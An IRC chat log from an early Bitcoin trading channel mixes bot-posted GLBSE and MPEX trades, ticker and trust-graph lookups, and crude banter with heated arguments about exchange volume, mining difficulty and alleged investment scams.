00:24:40 [GLBSE] [NYAN.C] 1 @ 0.44 BTC [-] Aug 31 00:25:21 [GLBSE] [NYAN.C] 12 @ 0.45 = 5.4 BTC [+] Aug 31 00:27:40 Is it me or gigavps profile picture looks photoshoped? Aug 31 00:28:07 who cares? Aug 31 00:28:16 [GLBSE] [OBSI.HRPT] 100 @ 0.104 = 10.4 BTC [+] Aug 31 00:28:19 Not really, I just noticed Aug 31 00:28:34 Not that I care. Aug 31 00:29:11 [GLBSE] [OBSI.1MHS] 1 @ 0.08499999 BTC [-] Aug 31 00:29:13 [GLBSE] [OBSI.1MHS] 3 @ 0.085 = 0.255 BTC [+] Aug 31 00:33:59 [MPEX] [F.GIGA.ETF] 5514 @ 0.00082845 = 4.5681 BTC [-] Aug 31 00:38:54 [GLBSE] [FUTUREFUND] 2 @ 0.00012189 = 0.0002 BTC [+] Aug 31 00:41:44 [MPEX] [F.GIGA.ETF] 9786 @ 0.00080868 = 7.9137 BTC [-] Aug 31 00:43:08 [MPEX] [S.BVPS] 20 @ 0.00363873 = 0.0728 BTC [-] Aug 31 00:43:09 [MPEX] [S.BVPS] 100 @ 0.00360259 = 0.3603 BTC [-] Aug 31 00:47:48 photoshopped how ? Aug 31 00:47:58 mp cares. Aug 31 00:48:00 that's his wife no ? Aug 31 00:54:21 [MPEX] [F.GIGA.ETF] 13500 @ 0.00082999 = 11.2049 BTC [+] Aug 31 00:55:57 [MPEX] [O.BTCUSD.P070T] 2 @ 0.02956441 = 0.0591 BTC [+] Aug 31 01:04:10 mircea_popescu: I had to make your disgusting acheivements public Aug 31 01:04:18 o ? Aug 31 01:04:21 what achievements ? Aug 31 01:04:40 http://www.encyclopediabitcoinica.com/wiki/Mircea_Popescu Aug 31 01:05:14 it occurs to me that article could benefit from a picture of my cock. Aug 31 01:05:15 lol Aug 31 01:05:29 also wtf they mean stub. Aug 31 01:05:32 it's not a stub. Aug 31 01:06:02 they're talking about your cock Aug 31 01:06:09 o rly ? Aug 31 01:06:20 and what's this ciuciu bs, everyone knows mpoe-pr's secret lover is psy Aug 31 01:07:58 mircea_popescu: that's why i titled the section 'personal lives' Aug 31 01:08:06 we all know you 2 time psy Aug 31 01:08:29 im really copumpkin and i dunno what you're talking about Aug 31 01:09:15 lol, i just looked to see if copumpkin /nicked to you Aug 31 01:10:07 lol Aug 31 01:20:32 ;;trilema Aug 31 01:20:33 Error: "trilema" is not a valid command. Aug 31 01:20:35 lmao Aug 31 01:20:37 ;;ticker Aug 31 01:20:38 Best bid: 10.70001, Best ask: 10.77699, Bid-ask spread: 0.07698, Last trade: 10.75, 24 hour volume: 30456, 24 hour low: 10.6, 24 hour high: 10.93199 Aug 31 01:21:16 [GLBSE] [IBB] 4 @ 0.55 = 2.2 BTC [-] Aug 31 01:22:00 [GLBSE] [OBSI.HRPT] 1 @ 0.104 BTC [+] Aug 31 01:24:01 [GLBSE] [CIUCIU.BOND] 4 @ 0.1 = 0.4 BTC [+] Aug 31 01:24:05 oh no Aug 31 01:24:13 the last line didn't make it Aug 31 01:25:45 [GLBSE] [GERBITIN.PYRA] 1 @ 0.89 BTC [-] Aug 31 01:26:56 [GLBSE] [GERBITIN.PYRA] 1 @ 0.98 BTC [+] Aug 31 01:27:01 there we go mircea_popescu, the punchline is there Aug 31 01:27:14 wiki you mean ? Aug 31 01:27:23 ya Aug 31 01:27:41 lol Aug 31 01:28:50 i must confess you and rg look really fetching in that pic Aug 31 01:28:59 also you're boobsisters, your left is hanging. Aug 31 01:29:17 [GLBSE] [V.HRL] 2 @ 1 = 2 BTC Aug 31 01:34:34 [GLBSE] [BDT] 5 @ 1.04 = 5.2 BTC [-] Aug 31 01:34:38 good boob tape is hard to find Aug 31 01:35:35 [GLBSE] [NYAN.B] 1 @ 1 BTC [+] Aug 31 01:35:38 lol EB Aug 31 01:35:42 whose is that? Aug 31 01:36:46 MrTiggr Aug 31 01:37:27 dub: http://www.encyclopediabitcoinica.com/wiki/Main:About Aug 31 01:37:27 [GLBSE] [JTME] 1 @ 0.9448 BTC [+] Aug 31 01:38:19 o, you too chmod755 ? Aug 31 01:38:28 lol prank phone Aug 31 01:39:39 does that imply ownership of the casting couch ? Aug 31 01:40:38 yep Aug 31 01:43:40 [GLBSE] [OBSI.HRPT] 4 @ 0.104 = 0.416 BTC [+] Aug 31 01:44:35 [GLBSE] [BBBB] 20 @ 0.00024 = 0.0048 BTC [+] Aug 31 01:45:41 [GLBSE] [BDK.BND] 5 @ 0.1015 = 0.5075 BTC [+] Aug 31 01:50:15 [GLBSE] [FUTUREFUND] 5 @ 0.00012189 = 0.0006 BTC [+] Aug 31 01:53:25 I think Satoshi Dice is going to crash. Aug 31 01:54:28 whyssat ? Aug 31 01:55:34 !ticker s.dice Aug 31 01:55:36 [MPEX:S.DICE] 1day: 0.0034 / 0.0034 / 0.0034 (2900 shares, 9.86 BTC), 30day: 0.0032 / 0.00324671 / 0.0034 (2772563 shares, 9,001.73 BTC) Aug 31 01:57:58 ;;gettrust pirateat40 Aug 31 01:57:59 Trust relationship from user mircea_popescu to user pirateat40: Level 1: -1, Level 2: 40 via 15 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=pirateat40 Aug 31 01:58:11 ;;ident pirateat40 Aug 31 01:58:12 Nick 'pirateat40', with hostmask 'pirateat40!~pirateat4@unaffiliated/pirateat40', is not identified. Aug 31 01:58:43 ::gettrust pirateat40 Aug 31 01:58:54 ;;gettrust pirateat40 Aug 31 01:58:55 Trust relationship from user chmod755 to user pirateat40: Level 1: 0, Level 2: 2 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=chmod755&dest=pirateat40 Aug 31 01:59:03 hmm Aug 31 01:59:06 O.o Aug 31 01:59:12 that graph really should blink red if there's -'s Aug 31 01:59:29 40 as in 60-20 is not the same as 40 as in 40 - 0 Aug 31 02:02:02 lmfao Aug 31 02:02:08 ;;gettrust mircea_popescu Aug 31 02:02:09 Trust relationship from user coingenuity to user mircea_popescu: Level 1: 0, Level 2: 9 via 6 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=coingenuity&dest=mircea_popescu Aug 31 02:02:14 heheheh Aug 31 02:02:33 o wow ? Aug 31 02:02:40 WoT at work Aug 31 02:03:01 ;;gettrust coingenuity Aug 31 02:03:01 Trust relationship from user chmod755 to user coingenuity: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=chmod755&dest=coingenuity Aug 31 02:03:07 :o Aug 31 02:03:10 XD Aug 31 02:03:13 how come you -'d imsaguy ? Aug 31 02:03:15 you dont participate on OTC much eh Aug 31 02:03:23 @ chmod755 Aug 31 02:03:24 ;;gettrust mircea_popescu Aug 31 02:03:25 Trust relationship from user chmod755 to user mircea_popescu: Level 1: 0, Level 2: 1 via 1 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=chmod755&dest=mircea_popescu Aug 31 02:03:34 coingenuity: not rly Aug 31 02:03:48 mircea_popescu: cuz he gave me a negative rating with a reason ":(" as an abuse of the rating system Aug 31 02:04:00 hm Aug 31 02:04:03 i don't really like that Aug 31 02:04:08 it's not what otc is for Aug 31 02:04:12 well yeah. Aug 31 02:04:24 i thought it was fallout from the entire pirate rthing Aug 31 02:04:30 and i saw him do it to a bunch of other people as well... so feh Aug 31 02:04:42 nah, not involved in the pirate thing at all lol Aug 31 02:04:46 mircea_popescu: i agree: 40-0 != 60-20 Aug 31 02:04:57 it should be Aug 31 02:04:59 ;;calc 60-(20**20) Aug 31 02:05:00 -104857600000000000000000000 Aug 31 02:05:02 ^ Aug 31 02:05:04 i was talking with toffoo yest, sorta collecting people who didn't get burned in this, bitcoinica and mybitcoin Aug 31 02:05:19 check check and check Aug 31 02:05:24 and i was around for all 3 Aug 31 02:05:25 lol Aug 31 02:05:30 chmod755 well maybe not quite that extreme, but... still. someone should drop sera j a line Aug 31 02:05:39 coingenuity so was i, shockingly. Aug 31 02:05:41 oops Aug 31 02:05:43 so then that's 3. Aug 31 02:05:53 oh wait Aug 31 02:05:56 i got burned on bitcoinica Aug 31 02:05:59 for 0.0003 btc Aug 31 02:06:03 :(((((((((( Aug 31 02:06:03 eh doesn't count. Aug 31 02:06:06 lol Aug 31 02:06:06 MY LIFE SAVINGS! Aug 31 02:06:12 :P Aug 31 02:06:20 that's not a burning that's a light warming Aug 31 02:06:32 lmfao Aug 31 02:06:40 i abandoned it since i thought bitcoinica was a crappy platform Aug 31 02:06:51 i didn't get burned in bitcoinica, mybitcoin, pirate, etc Aug 31 02:06:59 o hey! so 4 then. Aug 31 02:07:14 coingenuity onefixt for instance was trying to get them since forever to up the security Aug 31 02:07:21 people always think they know better than anyone. Aug 31 02:07:32 :/ yeah Aug 31 02:07:39 i was around for all three, didn't get burned by any either. Aug 31 02:07:41 ;;bc,tslb Aug 31 02:07:43 Time since last block: 33 minutes and 54 seconds Aug 31 02:07:47 :O Aug 31 02:07:54 33 minutes? Aug 31 02:07:55 all the asics Aug 31 02:08:00 ;;sudo make me a block Aug 31 02:08:00 do it yourself, punk. Aug 31 02:08:09 well actually there was one ~52 minutes last week. Aug 31 02:08:24 as difficulty goes up i think time variance will also increase. Aug 31 02:08:28 yeah weve seen some crazy long ones Aug 31 02:08:38 this might actually be the main flaw of birtcoin so far. Aug 31 02:08:50 with a diff of 2trn we might see three hour blocks. Aug 31 02:09:16 have seen some close to it Aug 31 02:09:24 we have had some LONG fsckin blocks Aug 31 02:09:49 basically what's difficulty ? it's pot odds. with low diff you have a 1:100 chance to win the pot. with higher it goes up, 1:10k etc Aug 31 02:10:01 if it's 1 to 10 billion well... getting lucky might take a long long time. Aug 31 02:10:18 but you have more people pulling tickets Aug 31 02:10:28 that's exactly it. Aug 31 02:10:48 if you do 100 tickets/hour and odds are 1:100 you might have to wait two hours. Aug 31 02:11:03 if you do 100million tickets/hour and odds are 1:100mn you might have to wait a day and a half. Aug 31 02:11:30 nah Aug 31 02:11:34 you are getting emotional Aug 31 02:11:46 ahaa am i ? Aug 31 02:12:07 i think it's basic statistics tbh Aug 31 02:12:54 as the odds of a phenomenon occuring go down, the variance in it's observation goes up. not in fixed proportion, but still, monotonous growing function. Aug 31 02:14:28 hit a block yay Aug 31 02:14:42 ;;bc,tslb Aug 31 02:14:43 Time since last block: 1 minute and 46 seconds Aug 31 02:18:02 [MPEX] [S.MPOE] 9100 @ 0.00039407 = 3.586 BTC [+] Aug 31 02:20:07 ;;ticker Aug 31 02:20:08 Best bid: 10.7, Best ask: 10.7699, Bid-ask spread: 0.06990, Last trade: 10.7699, 24 hour volume: 30969, 24 hour low: 10.6, 24 hour high: 10.93199 Aug 31 02:20:29 mp, but difficulty is also affected by 'luck' or 'odds of occuring' Aug 31 02:20:33 incredibly low volume isn't it Aug 31 02:20:39 kakobrekla what do you mean ? Aug 31 02:21:09 well its only affecty by odds of occuring tbh Aug 31 02:21:18 not by hashrate Aug 31 02:22:00 well ya, i wasn't speaking of hashrate. Aug 31 02:22:03 just difficulty. Aug 31 02:22:29 well anyway Aug 31 02:22:36 i guess if there will be more longer blocks Aug 31 02:22:40 more people will use smpake Aug 31 02:23:12 i guess so hehehe Aug 31 02:28:53 Chaang-Noi continues to fight the good fight Aug 31 02:28:58 Pirate will not win Aug 31 02:29:07 He will not settle for less than what the people are due. Aug 31 02:29:14 FOR THE WORKERS Aug 31 02:32:02 o ? Aug 31 02:33:35 [GLBSE] [OBSI.HRPT] 99 @ 0.1039 = 10.2861 BTC [-] Aug 31 02:33:37 [GLBSE] [OBSI.HRPT] 364 @ 0.104 = 37.856 BTC [+] Aug 31 02:33:38 [GLBSE] [OBSI.HRPT] 450 @ 0.104888 = 47.1996 BTC [+] Aug 31 02:33:40 [GLBSE] [OBSI.HRPT] 63 @ 0.104889 = 6.608 BTC [+] Aug 31 02:33:41 [GLBSE] [OBSI.HRPT] 24 @ 0.1048899 = 2.5174 BTC [+] Aug 31 02:34:04 [GLBSE] [TYGRR.BOND-P] 34 @ 0.139 = 4.726 BTC [+] Aug 31 02:34:18 [MPEX] [S.MPOE] 46644 @ 0.00039327 = 18.3437 BTC [-] Aug 31 02:34:54 [GLBSE] [BDK.BND] 1 @ 0.1015 BTC [+] Aug 31 02:34:55 [GLBSE] [BTC-MINING] 47 @ 0.95 = 44.65 BTC [+] Aug 31 02:35:54 [GLBSE] [TYGRR.BOND-P] 40 @ 0.13999 = 5.5996 BTC [+] Aug 31 02:36:02 Go BTC Mining Aug 31 02:37:34 At this rate I will own all BTC-Mining shares =/ Aug 31 02:39:43 buying into the selloff ? Aug 31 02:41:07 aye Aug 31 02:45:34 [GLBSE] [JAH] 14 @ 0.16 = 2.24 BTC [-] Aug 31 02:47:30 ;;bc,stats Aug 31 02:47:32 Current Blocks: 196475 | Current Difficulty: 2440642.606916 | Next Difficulty At Block: 197567 | Next Difficulty In: 1092 blocks | Next Difficulty In About: 1 week, 0 days, 0 hours, 2 minutes, and 48 seconds | Next Difficulty Estimate: 2646929.59678370 | Estimated Percent Change: 8.45215884059 Aug 31 02:48:21 [GLBSE] [TYGRR.BOND-P] 10 @ 0.11001339 = 1.1001 BTC [-] Aug 31 02:48:54 [GLBSE] [TYGRR.BOND-P] 21 @ 0.14 = 2.94 BTC [+] Aug 31 02:48:56 [GLBSE] [TYGRR.BOND-P] 104 @ 0.17 = 17.68 BTC [+] Aug 31 02:51:35 [GLBSE] [PPT.E] 51 @ 0.399 = 20.349 BTC [+] Aug 31 02:52:15 [GLBSE] [YARR] 1 @ 0.9 BTC [-] Aug 31 02:53:33 [GLBSE] [JAH] 6 @ 0.16 = 0.96 BTC [-] Aug 31 02:54:46 [MPEX] [S.MPOE] 7700 @ 0.00039407 = 3.0343 BTC [+] Aug 31 02:54:53 BTC-Mining: what are your intentions for BTC-BOND when the available shares are all sold, will you issue more shares? Aug 31 02:55:51 Possibly, as long as the total amount loaned from BTC-BOND is equal or less than 50% of the total amount of investments made Aug 31 02:56:21 [GLBSE] [PUREMINING] 1 @ 0.08760001 BTC [-] Aug 31 02:57:02 Any idea how much room for ivnest that actually is, in btc terms? Aug 31 02:57:10 investment* Aug 31 02:57:39 Around 1400 BTC Aug 31 02:57:45 gotcha, thank you Aug 31 02:58:10 Which would match my personal investment, making the loan 50% of the total Aug 31 02:58:30 I'll probably keep a larger margin however since some stocks can go down in value Aug 31 02:59:41 [GLBSE] [OBSI.HRPT] 25 @ 0.1048 = 2.62 BTC [-] Aug 31 03:00:32 [GLBSE] [PUREMINING] 1 @ 0.08760001 BTC [-] Aug 31 03:01:26 [GLBSE] [PUREMINING] 2 @ 0.08721 = 0.1744 BTC [-] Aug 31 03:02:02 [MPEX] [S.MPOE] 26100 @ 0.00039407 = 10.2852 BTC [+] Aug 31 03:02:02 [MPEX] [S.MPOE] 16200 @ 0.00039446 = 6.3903 BTC [+] Aug 31 03:02:04 [MPEX] [S.MPOE] 2700 @ 0.00039487 = 1.0661 BTC [+] Aug 31 03:03:21 [GLBSE] [BITCOINRS] 2 @ 0.050001 = 0.1 BTC [-] Aug 31 03:03:46 [GLBSE] [BITCOINRS] 2 @ 0.047 = 0.094 BTC [-] Aug 31 03:04:26 [GLBSE] [FOO.PPPPT] 3 @ 0.14 = 0.42 BTC [+] Aug 31 03:04:38 [GLBSE] [OBSI.HRPT] 49 @ 0.1048899 = 5.1396 BTC [+] Aug 31 03:11:52 [GLBSE] [NYAN.C] 1 @ 0.45 BTC [+] Aug 31 03:18:40 [GLBSE] [TYGRR.BOND-P] 10 @ 0.17248 = 1.7248 BTC [+] Aug 31 03:18:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.1734 BTC [+] Aug 31 03:31:30 [GLBSE] [PUREMINING] 2 @ 0.0929 = 0.1858 BTC [+] Aug 31 03:31:51 [GLBSE] [PUREMINING] 7 @ 0.093 = 0.651 BTC [+] Aug 31 03:37:11 [MPEX] [F.GIGA.ETF] 646 @ 0.00082999 = 0.5362 BTC [+] Aug 31 03:37:12 [MPEX] [F.GIGA.ETF] 6384 @ 0.00083 = 5.2987 BTC [+] Aug 31 03:41:32 [MPEX] [F.GIGA.ETF] 12914 @ 0.00081533 = 10.5292 BTC [-] Aug 31 03:41:33 [MPEX] [F.GIGA.ETF] 14800 @ 0.00080874 = 11.9694 BTC [-] Aug 31 03:41:34 [MPEX] [F.GIGA.ETF] 2286 @ 0.00078927 = 1.8043 BTC [-] Aug 31 03:45:44 [GLBSE] [MATH] 1 @ 0.5 BTC [+] Aug 31 03:47:10 [MPEX] [S.MPOE] 1000 @ 0.00039327 = 0.3933 BTC [-] Aug 31 03:49:17 [GLBSE] [TYGRR.BOT] 14 @ 0.91 = 12.74 BTC [+] Aug 31 03:56:13 [MPEX] [S.MPOE] 7163 @ 0.00039327 = 2.817 BTC [-] Aug 31 03:56:15 [MPEX] [S.MPOE] 13437 @ 0.00039203 = 5.2677 BTC [-] Aug 31 03:57:13 [GLBSE] [ARS] 120 @ 0.0147 = 1.764 BTC [-] Aug 31 04:00:03 [GLBSE] [ARS] 41 @ 0.0147 = 0.6027 BTC [-] Aug 31 04:00:38 [GLBSE] [FOO.PPPPT] 2 @ 0.154998 = 0.31 BTC [+] Aug 31 04:00:40 [GLBSE] [FOO.PPPPT] 50 @ 0.154999 = 7.75 BTC [+] Aug 31 04:10:03 [GLBSE] [TYGRR.BOND-P] 98 @ 0.17899 = 17.541 BTC [+] Aug 31 04:13:37 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Aug 31 04:21:06 [GLBSE] [BIB.PIRATE] 1 @ 0.15 BTC [+] Aug 31 04:21:08 [GLBSE] [BIB.PIRATE] 3 @ 0.15498 = 0.4649 BTC [+] Aug 31 04:21:09 [GLBSE] [BIB.PIRATE] 50 @ 0.15499 = 7.7495 BTC [+] Aug 31 04:21:10 [GLBSE] [BIB.PIRATE] 1 @ 0.17 BTC [+] Aug 31 04:34:27 [GLBSE] [MPOE.ETF] 2 @ 1.3 = 2.6 BTC [-] Aug 31 04:35:01 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.8 BTC [+] Aug 31 04:35:51 [GLBSE] [NYAN] 2 @ 1.01 = 2.02 BTC [+] Aug 31 04:36:43 [GLBSE] [SILVER] 2 @ 0.0095 = 0.019 BTC [-] Aug 31 04:38:01 [GLBSE] [FUTUREFUND] 59 @ 0.000116 = 0.0068 BTC [-] Aug 31 04:38:59 [GLBSE] [GSDPT] 2 @ 0.00305 = 0.0061 BTC [-] Aug 31 04:41:10 [GLBSE] [GSDPT] 10 @ 0.003003 = 0.03 BTC [-] Aug 31 04:41:27 [GLBSE] [TYGRR.BOND-P] 1 @ 0.17160848 BTC [-] Aug 31 04:50:49 [GLBSE] [TYGRR.BOND-P] 18 @ 0.2399 = 4.3182 BTC [+] Aug 31 04:50:49 [GLBSE] [TYGRR.BOND-P] 20 @ 0.24 = 4.8 BTC [+] Aug 31 04:50:51 [GLBSE] [TYGRR.BOND-P] 98 @ 0.30999999 = 30.38 BTC [+] Aug 31 04:50:52 [GLBSE] [TYGRR.BOND-P] 164 @ 0.31 = 50.84 BTC [+] Aug 31 04:54:43 ;;ticker Aug 31 04:54:43 Best bid: 10.72, Best ask: 10.77999, Bid-ask spread: 0.05999, Last trade: 10.77999, 24 hour volume: 29744, 24 hour low: 10.6, 24 hour high: 10.93199 Aug 31 04:55:28 [GLBSE] [PPT.A] 13 @ 0.332 = 4.316 BTC [-] Aug 31 04:56:30 [GLBSE] [PPT.B] 28 @ 0.34 = 9.52 BTC [+] Aug 31 04:56:44 [GLBSE] [PUREMINING] 9 @ 0.088 = 0.792 BTC [-] Aug 31 05:09:50 [GLBSE] [BITNODES] 3 @ 0.2529 = 0.7587 BTC [-] Aug 31 05:10:16 [GLBSE] [GSDPT] 300 @ 0.003003 = 0.9009 BTC [-] Aug 31 05:19:11 [MPEX] [S.MPOE] 16306 @ 0.00039487 = 6.4388 BTC [+] Aug 31 05:21:18 [GLBSE] [TYGRR.BOND-P] 18 @ 0.125002 = 2.25 BTC [-] Aug 31 05:21:20 [GLBSE] [TYGRR.BOND-P] 125 @ 0.12500001 = 15.625 BTC [-] Aug 31 05:21:21 [GLBSE] [TYGRR.BOND-P] 23 @ 0.125 = 2.875 BTC [-] Aug 31 05:21:22 [GLBSE] [TYGRR.BOND-P] 1 @ 0.11 BTC [-] Aug 31 05:21:24 [GLBSE] [TYGRR.BOND-P] 39 @ 0.1 = 3.9 BTC [-] Aug 31 05:21:25 [GLBSE] [TYGRR.BOND-P] 94 @ 0.1 = 9.4 BTC [-] Aug 31 05:22:16 lmao what is this tygrr bond bs ? 50 btc @ 0,31 half hour ago, now .1 ? Aug 31 05:23:07 that was me Aug 31 05:23:10 selling Aug 31 05:23:16 added a 0 where i should not have Aug 31 05:23:32 oh well lol Aug 31 05:24:37 you sold at .12 ?! Aug 31 05:26:55 [MPEX] [S.MPOE] 22394 @ 0.00039487 = 8.8427 BTC [+] Aug 31 05:26:56 [MPEX] [S.MPOE] 6592 @ 0.00039526 = 2.6056 BTC [+] Aug 31 05:30:01 yes i sold at .12 Aug 31 05:30:08 and .1 Aug 31 05:30:20 i wanted to list at .30 but i fucked up and did .03 Aug 31 05:30:25 no coffee Aug 31 05:30:39 anyway only 300 shares and pirates not going to pay anyway Aug 31 05:31:23 myea. Aug 31 05:31:31 im fine with that sale at .1 Aug 31 05:31:36 but it was a slip Aug 31 05:32:13 i sold 1000 shares at .06 yesterday Aug 31 05:34:24 im surprised anyone's still buying. Aug 31 05:36:00 well, it's pretty much the only thing to daytrade Aug 31 05:36:02 [GLBSE] [BDT] 10 @ 1 = 10 BTC [-] Aug 31 05:36:06 got more volume than anything on glbse Aug 31 05:36:42 [GLBSE] [BDT] 6 @ 1.04 = 6.24 BTC [+] Aug 31 05:37:17 it did lose a lot of volume this month didn't it. Aug 31 05:37:33 Aye, well with the pirate mess, not much trading anymore Aug 31 05:37:35 [MPEX] [S.MPOE] 4800 @ 0.00039526 = 1.8972 BTC [+] Aug 31 05:39:48 yeah glbse is dead right now more or less Aug 31 05:39:57 i assumed this would happen Aug 31 05:40:01 its why i never bought yarr Aug 31 05:40:15 insurance backed by assets on glbse, when glbse is pumped up by pirate money Aug 31 05:40:19 everony sells Aug 31 05:40:20 well, it had a good run. two versions and all. Aug 31 05:40:31 im sure some people will miss it. Aug 31 05:40:38 oh lol, it is still 10,000x more active and useable than anyhting else Aug 31 05:40:43 lolz. Aug 31 05:40:45 lol mircea, stop acting like GLBSE is going away Aug 31 05:40:49 glbse is not going anywhere Aug 31 05:40:50 BTC-Mining it is. Aug 31 05:40:57 it has the volume of a limp duck. Aug 31 05:41:07 at least it has that Aug 31 05:41:11 also it's being registered in the UK Aug 31 05:41:11 better than porn site mpex Aug 31 05:41:12 but hey, last guy in turn off the lights. Aug 31 05:41:32 Chaang-Noi you realise glbse is currently one of the mpex brokers and nothing else ? Aug 31 05:41:37 not even the highest volume one, at that. Aug 31 05:41:43 and nothing else? Aug 31 05:42:02 lol okay im done with you, if you need to lie to sound importnat i wont talk to you, just like i wont talk to d3 Aug 31 05:42:11 GLBSE is still beta software, it's not even technically released yet... Aug 31 05:42:16 lolz Aug 31 05:42:19 !ticker gigamining Aug 31 05:42:24 [GLBSE:GIGAMINING] [Bid: 0.79991] [Ask: 0.867799] [Spread: 0.067889] [Last: 0.82] [24hVol: 174.9283189] [7dAvg: 0.90897214] Aug 31 05:42:24 !ticker f.giga.etf Aug 31 05:42:25 [MPEX:F.GIGA.ETF] 1day: 0.00078927 / 0.00086024 / 0.0009155 (347750 shares, 299.15 BTC), 30day: 0.00064789 / 0.00098639 / 0.00115139 (7894546 shares, 7,787.16 BTC) Aug 31 05:42:36 even giga's etf does more volume on mpex than on glbse. Aug 31 05:42:46 srsly, you need a handle on reality Chaang-Noi. Aug 31 05:43:22 you moving stocks back and forth to your account is not "volume" Aug 31 05:43:28 lmao right. Aug 31 05:43:51 ahahahaah Aug 31 05:44:21 weren't you just telling about how you're pushing your own silly cvasi-fraud ? Aug 31 05:44:25 what teh fuck you talking about lmao Aug 31 05:46:00 [MPEX] [F.GIGA.ETF] 3700 @ 0.00079232 = 2.9316 BTC [+] Aug 31 05:48:02 [GLBSE] [OBSI.HRPT] 8 @ 0.1048899 = 0.8391 BTC [+] Aug 31 05:49:31 [MPEX] [F.GIGA.ETF] 10583 @ 0.00079232 = 8.3851 BTC [+] Aug 31 05:49:39 mircea_popescu, howmany users do you have Aug 31 05:49:40 selling and buying my debt to make money is differnt than faking volume to make it look like i ahve volume... Aug 31 05:50:14 dude, it's just funnay. you've been trading with yourself to give the appearance of volume to that turd of yours, and now you accuse me of doing it ? lol. Aug 31 05:50:24 im sure it'll stick. what with you being credible and all. Aug 31 05:50:41 kakobrekla im actually starting to suspect more than glbse. a bunch added this month, too. Aug 31 05:51:38 ballpark number? Aug 31 05:51:39 mircea, stop deluding yourself... if you don't make an interface like a broker and insist on having a stock exchange backbone and only allow quality companies IPOing, you'll need brokerage platforms like GLBSE Aug 31 05:51:53 Which acts like any bank's online brokerage service Aug 31 05:51:54 more than 100 less than 1k. Aug 31 05:52:26 BTC-Mining i would like better run platforms tho. Aug 31 05:52:46 It's a beta... it's not even supposed to be finished yet... Aug 31 05:52:50 right. Aug 31 05:52:52 People just started using it Aug 31 05:53:18 lol. you are aware glbse was scamming investors back in june last year right ? Aug 31 05:53:46 I wasn't aware, links? Aug 31 05:53:57 You should show proof indeed. Aug 31 05:54:28 Ignatius-otc SIN. LIF.A LIF.B LIF.CX. SMM. DISHWARA. PBJ. UBTC. BitFlowSys. GEM. SLV. BID. USGOLD. BB. SDM. Aug 31 05:54:31 forum's your friend. Aug 31 05:54:43 add it all up, it comes up to more than the most recent pirate thingee. Aug 31 05:55:08 this if we look the other way and pretend to not notice that giga's thing went from 1.5 to .8 in the time it took it to pay ~.2 in dividends. Aug 31 05:55:13 Was any of those asset issued by Nefario? Aug 31 05:55:44 o dude i dunno, there was this guy that came and stole your money in my house ?! odd dood... Aug 31 05:56:02 o, you mean we were all friendly and all ? well... ya, it happens, you know... investin'. Aug 31 05:56:05 in da hood. Aug 31 05:56:15 free market! Aug 31 05:56:50 [MPEX] [F.GIGA.ETF] 1417 @ 0.00079232 = 1.1227 BTC [+] Aug 31 05:56:56 glbse clearly state they're not regulating what's getting on the platform and to investigate the issuer yourself Aug 31 05:57:17 and this clearly is a flawed business model. Aug 31 05:57:27 Also Gigamining paid over 0.4BTC in dividends so far Aug 31 05:57:43 [MPEX] [S.MPOE] 1200 @ 0.0003934 = 0.4721 BTC [-] Aug 31 05:57:55 !pl gigamining 1.5 Aug 31 05:57:56 Requesting data from GLBSE (might take a while). Aug 31 05:57:59 GIGAMINING [1@1.5BTC] paid: 0.41490096 BTC. Last price: 0.82 BTC. Capital gain: -0.68 BTC. Total: -0.26509904 BTC. (-17.7%) Aug 31 05:58:15 41 the man says, but you got a point there. Aug 31 05:58:33 -17% in 4 months is not so bad, given the alternatives on glbse. Aug 31 05:58:57 don't forget that GIGAMINING is not completly fixed, it upgrades Aug 31 05:59:06 im just working on past data. Aug 31 05:59:20 the future's outside the scope of this conversation. Aug 31 06:00:38 .py 0.823 ** 3 Aug 31 06:00:41 0.557441767 Aug 31 06:00:43 [MPEX] [F.GIGA.ETF] 7600 @ 0.00080907 = 6.1489 BTC [+] Aug 31 06:01:37 half yer money in a year, who can argue with that. Aug 31 06:01:56 !pl futurefund 0.0001 Aug 31 06:01:56 Requesting data from GLBSE (might take a while). Aug 31 06:01:59 FUTUREFUND [1@0.0001BTC] paid: 1.625E-5 BTC. Last price: 0.000116 BTC. Capital gain: 1.6E-5 BTC. Total: 0.00003225 BTC. (32.3%) Aug 31 06:01:59 [MPEX] [S.MPOE] 39701 @ 0.0003934 = 15.6184 BTC [-] Aug 31 06:02:00 [MPEX] [S.MPOE] 34008 @ 0.00039526 = 13.442 BTC [+] Aug 31 06:02:01 [MPEX] [S.MPOE] 5519 @ 0.00039584 = 2.1846 BTC [+] Aug 31 06:02:02 [MPEX] [S.MPOE] 10372 @ 0.0003959 = 4.1063 BTC [+] Aug 31 06:02:03 [MPEX] [S.MPOE] 17400 @ 0.00039624 = 6.8946 BTC [+] Aug 31 06:02:04 [MPEX] [S.MPOE] 37900 @ 0.00039662 = 15.0319 BTC [+] Aug 31 06:02:05 [MPEX] [S.MPOE] 39000 @ 0.00039689 = 15.4787 BTC [+] Aug 31 06:02:06 [MPEX] [S.MPOE] 11800 @ 0.00039712 = 4.686 BTC [+] Aug 31 06:02:07 [MPEX] [S.MPOE] 27922 @ 0.0003973 = 11.0934 BTC [+] Aug 31 06:02:08 [MPEX] [S.MPOE] 6378 @ 0.00039781 = 2.5372 BTC [+] Aug 31 06:02:16 I fail to see a direct connection showing collusion by GLBSE staff. Aug 31 06:02:31 when are smpoe div commin out Aug 31 06:02:35 Next time you are looking at one mp, please forward it along. Aug 31 06:02:39 tomorrow about this time kakobrekla Aug 31 06:02:46 k Aug 31 06:02:49 Ignatius-otc mkay, lets see here Aug 31 06:02:51 yes, yes... and you're completly ignoring why the price is currently low and declare it as a linear loss of value Aug 31 06:03:01 !pl gigamining 1 Aug 31 06:03:02 Requesting data from GLBSE (might take a while). Aug 31 06:03:15 i bought in at 1 Aug 31 06:03:37 Didn't gigamining IPO at 1 by the way? Aug 31 06:03:39 GIGAMINING [1@1BTC] paid: 0.41490096 BTC. Last price: 0.82 BTC. Capital gain: -0.18 BTC. Total: 0.23490096 BTC. (23.5%) Aug 31 06:03:46 yes i bought a huge amount at 1 Aug 31 06:03:52 Making it a 0.20 loss for 0.40 dividend? Aug 31 